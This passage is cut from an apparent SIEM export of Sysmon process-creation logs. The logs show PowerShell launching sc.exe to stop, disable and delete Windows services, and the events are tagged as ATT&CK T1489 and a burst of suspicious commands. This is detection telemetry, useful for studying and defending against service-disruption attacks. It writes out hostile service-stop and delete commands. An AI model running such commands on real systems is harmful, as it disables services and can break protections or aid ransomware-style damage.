Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""Sncryption Media Playeq\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.791",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.468 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-00105f541900} +ProcessId: 6452 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.471194000Z"",""eventRecordID"":""2090"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.468\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00105f541900}\r\nProcessId: 6452\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.468"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00105f541900}"",""processId"":""6452"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.743",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.426 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001003521900} +ProcessId: 3068 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.428641800Z"",""eventRecordID"":""2087"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.426\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001003521900}\r\nProcessId: 3068\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.426"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001003521900}"",""processId"":""3068"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.712",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.406 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-00106f501900} +ProcessId: 3532 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.407840800Z"",""eventRecordID"":""2085"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.406\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00106f501900}\r\nProcessId: 3532\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.406"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00106f501900}"",""processId"":""3532"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.698",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.395 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010a64f1900} +ProcessId: 968 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.396931100Z"",""eventRecordID"":""2084"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.395\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010a64f1900}\r\nProcessId: 968\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.395"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010a64f1900}"",""processId"":""968"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.651",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.356 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010494d1900} +ProcessId: 1160 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.358937700Z"",""eventRecordID"":""2081"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.356\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010494d1900}\r\nProcessId: 1160\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.356"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010494d1900}"",""processId"":""1160"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.603",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.317 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010eb4a1900} +ProcessId: 3780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.318925700Z"",""eventRecordID"":""2078"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.317\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010eb4a1900}\r\nProcessId: 3780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.317"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010eb4a1900}"",""processId"":""3780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 